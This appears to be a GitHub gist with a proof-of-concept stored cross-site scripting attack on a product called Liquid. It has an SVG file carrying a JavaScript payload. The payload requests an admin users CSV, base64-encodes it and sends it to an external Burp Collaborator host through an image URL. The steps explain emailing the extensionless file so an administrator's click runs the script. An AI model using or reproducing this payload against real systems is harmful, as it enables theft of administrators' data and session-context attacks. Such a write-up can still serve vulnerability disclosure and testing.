Skip to content

Instantly share code, notes, and snippets.

@rodnt

rodnt/xss-liquid-no-ext.gif Secret

Created Apr 4, 2021
Embed
What would you like to do?
XSS liquid files
Steps to reproduce
1 - Create a file without extension, with the content below inside
```
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,100 100,0" fill="#0000FF" stroke="#0000FF"/>
<script type="text/javascript">
function a(){
alert(1);
var xhr = new XMLHttpRequest();
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
alert(xhr.responseText);
}
}
var data = xhr.open('GET', 'https://192.168.43.113/admin/users.csv', true);
b64 = btoa(unescape(encodeURIComponent(data)));
var img = document.createElement('img');
img.src = 'https://2sv7gm42cnqse2cap2vkdihlscy2mr.burpcollaborator.net/' + b64 + '.png';
xhr.send(null);
}
a();
</script>
</svg>
```
2 - With an external user send an email with that file (without any extension) to admin or someone.
3 - With admin account go to menu click on "Data" inside Data menu click at "Messages" and inside Messages select the message that you at step 2. In the table click on the filename row over your file, the javascript code will be executed.
@rodnt

This comment has been minimized.

Copy link
Owner Author

@rodnt rodnt commented Apr 4, 2021

xss-no-type-bypass

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment